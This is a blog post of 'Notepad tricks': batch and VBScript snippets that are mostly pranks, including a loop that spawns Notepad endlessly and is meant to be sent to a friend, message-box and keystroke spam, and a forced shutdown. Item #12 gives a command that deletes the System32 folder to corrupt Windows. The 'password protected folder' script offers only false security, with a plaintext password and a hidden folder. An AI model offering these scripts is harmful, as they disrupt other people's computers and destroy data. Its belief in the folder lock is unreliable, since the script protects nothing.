Skip to main content

Notepad Tricks (Codes & Hacks)

What is Notepad?

It is a software which is present on every OS (Operating System) of the computer. However, there may name changes of that software. Well, donā€™t worry If you are using windows then it will help you very easily. Notepad is like you can just program your computer with it and that computer will do work as said in programs. You can do a lot of fun with these Notepad tricks. If you want to learn programming of Notepad then I will suggest you learn Batch Programming. It is using in Notepad tricks, well you can use a lot of other languages but these tricks are especially for funny and cool notepad tricks. And you can make HTML files and use all other programming languages. But you should change the extension of Notepad. Extension starts from (.bat .html .tag .vbs etc) there are lot of extension. You can also make your friend jealous of you with the help of these notepad tricks.

Best Notepad Tricks (Cool Notepad Tricks)

#1. Make Fake Windows error with the Notepad Tricks.

With the help of this trick, you can make your friends problem and feel them worry about their PC. So, you can use this type of trick.
  • Open Notepad.
  • Type X=Msgbox(ā€œPut your Message Hereā€,0+16,ā€Put Title Hereā€)
  • You can replace put your message here and put a funny sentence. It will be visible when this error occurred.
  • Save this file as errors.vbs

#2. Force CD Drive to Open continually

  • Just open your notepad and paste these codes.
Set oWMP = CreateObject(ā€œWMPlayer.OCX.7ā€³)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count ā€“ 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count ā€“ 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Then save this file as CDhack.vbs
  • When you double click on that program then CD Drive will open automatically.

#3. Make Own Daily Diary in Notepad

This is amazing Notepad tricks which will allow you to make your own Dialy diary. When you write anything on this notepad then it will automatically add time and date to your text. It is Cool Notepad tricks. You should follow some steps to do:
  • First thing first, So you have to open notepad and it is because it is very important step šŸ˜€
  • Type .LOG on your Notepad.
  • Then save it as Diary.txt
  • So, whenever you will write something on this notepad it will add time and date.
Open Notepad in friendā€™s computer continuously
Type this in Notepad
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top
Save it as tech maniya.bat and send it your friend. When He will open that program then He will be in small trouble.

#4. Make Keyboard LED lights to Dance

Donā€™t think that these lights will dance and entertain you. But it will flicker like on and off lights. Your all lights Num lock, scroll lock, caps lock.
  • Just Open your Notepad.
  • Paste this secret code in your notepad.
Set wshShell =wscript.CreateObject(ā€œWScript.Shellā€)
do
wscript.sleep 100
wshshell.sendkeys ā€œ{CAPSLOCK}ā€
wshshell.sendkeys ā€œ{NUMLOCK}ā€
wshshell.sendkeys ā€œ{SCROLLLOCK}ā€
loop
  • Save this file as Disco.vbs
  • So, whenever you will open it then your all lights will dance like it will blinks.

#5. Test your Antivirus with Notepad

This is an amazing Notepad trick to check your antivirus program. You have to follow some basic steps.
  • Open Notepad and paste below codes.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • And Now save this file as ANTIvirus.exe
  • So, if your antivirus is working perfectly then your antivirus will tell you to delete this file.
  • If nothing happens then just change your antivirus Now.

#6. Matrix effect with Notepad

This trick is most popular notepad tricks and cool notepad tricks.
  • Just open Notepad and paste the following codes.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
  • Save this file as MaTrIx.bat

#7. Repeat messages on screen continuously

  • Open your notepad and paste this code
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
  • Now save this file as Rpt.bat

#8. Type YOU ARE FOOL Continuously

  • Just copy this code.
Set wshShell = wscript.CreateObject(ā€œWScript.Shellā€)
do
wscript.sleep 100
wshshell.sendkeys ā€œYou are a fool.ā€
loop
  • And save this file as MSG.vbs and thatā€™s it.

#9. Force windows to shut down

With the help of this trick your windows will shut down forcedly.
  • Just open notepad
  • Paste @echo off in next line.
  • Paste *shutdown computer in next line.
  • Paste shutdown ā€“c ā€œsleep tightā€ ā€“s
  • Save this file as Shut.bat
  • Then just open that notepad and then your PC will automatically shut down.

#10. Make password protected folder with Notepad

If you donā€™t want to use folder lock then you can use this self-made locker for your folders. This is really amazing and interesting notepad tricks.
  • Open your Notepad.
@ECHO OFF
title Folder Private
if EXIST ā€œControl Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}ā€ goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p ā€œcho=>ā€
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private ā€œControl Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}ā€
attrib +h +s ā€œControl Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}ā€
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the folder
set/p ā€œpass=>ā€
if NOT %pass%== techmaniya.com goto FAIL
attrib -h -s ā€œControl Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}ā€
ren ā€œControl Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}ā€ Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
  • com wrote in red color in your password.
  • Save that file as folderlock.bat
  • Now paste those files under folderlock.bat and your password will be techmaniya.com
  • So, no one will able to see your folders without your permission.

#11. Pressing Backspace Automatically

  • Just Open your Notepad and enter this code.
MsgBox ā€œBackspace again and again and AGAINā€
Set wshShell =wscript.CreateObject(ā€œWScript.Shellā€)
do
wscript.sleep 100
wshshell.sendkeys ā€œ{bs}ā€
loop
  • Then save as to BS.vbs format.
After opening it, backspace will automatically start pressing.

#12. Delete Windows/System32 (Notepad Codes)

With the help of this trick you can delete all files of System32, then windows will be corrupted.
DEL C:\WINDOWS\SYSTEM32\*.*/Q
Save it as .bat then open it. After that your system files will be deleted.
Note: Donā€™t use this code, unless you donā€™t know about windows corrupt. 

Comments

Popular posts from this blog

Banking (ICSE Class 10 Mathematics Project)

BANK ACCOUNT A bank account is a financial account between a bank customer and a financial institution. A bank account can be a deposit account, a credit card, or any other type of account offered by a financial institution. The financial transactions which have occurred within a given period of time on a bank account are reported to the customer on a bank statement and the balance of the account at any point in time is the financial position of the customer with the institution. a fund that a customer has entrusted to a bank and from which the customer can make withdrawals. BANK A bank is a financial institution and a financial intermediary that accepts deposits and channels those deposits into lending activities, either directly by loaning or indirectly through capital markets. A bank links together customers that have capital deficits and customers with capital surplu...

BlueStacks

BlueStacks Industry Virtualization ,  mobile software Founded April 2009 ; 8 years ago Founders Rosen Sharma, Jay Vaishnav, Suman Saraf Headquarters Campbell, California , United States Products App Player, GamePop Website www .bluestacks .com BlueStacks App Player Bluestack Client with Android  home screen  open as of September 2014. Stable release 2.7.315.8233 Development status Active Operating system Windows  XP or later;  Mac OS X  Mavericks or later Platform IA-32 Size 307  MB Available in 47 languages Type Android emulator License Freeware Website www .bluestacks .co m Bluestacks  is an  American  technology company that produces the BlueStacks App Player and other  cloud -based  cross-platform  products. The BlueStacks App Player is designed to enable  Android  applications to run on PCs running  Microsoft Windows  and  macOS . The company was...

Online shopping

Online shopping   is a form of   electronic commerce   which allows consumers to directly buy   goods   or   services   from a seller over the   Internet   using a   web browser. Consumers find a product of interest by visiting the   website   of the retailer directly or by searching among alternative vendors using a   shopping search engine, which displays the same product's availability and pricing at different e-retailers. As of 2016, customers can shop online using a range of different computers and devices, including   desktop computers,   laptops,   tablet computers   and   smartphones. An online shop evokes the physical analogy of buying   products   or services at a regular   "bricks-and-mortar"retailer   or   shopping center; the process is called business-to-consumer (B2C) online shopping. When an online store is set up to enable businesses to buy from another...